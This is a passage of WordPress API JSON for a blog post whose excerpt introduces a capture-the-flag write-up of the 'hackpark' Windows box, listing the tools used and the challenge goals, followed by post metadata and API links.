solution to this box without needing Metasploit.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>5\/5 &#8211; (1 vote) CHALLENGE OVERVIEW Link: hackpark Difficulty: Medium Target: user and root flags on a windows machine Highlight: using metasploit to quickly and easily gain root access\u00a0 Tools: nmap, dirb, hydra, burpsuite, msfvenom Tags: RCE (remote code execution), Windows BACKGROUND In this box, we will hack into a windows machine using standard pen-testing [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-131281","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131281","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=131281"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131281\/revisions"}],"wp:attachment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/media?parent=131281"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=131281"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=131281"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}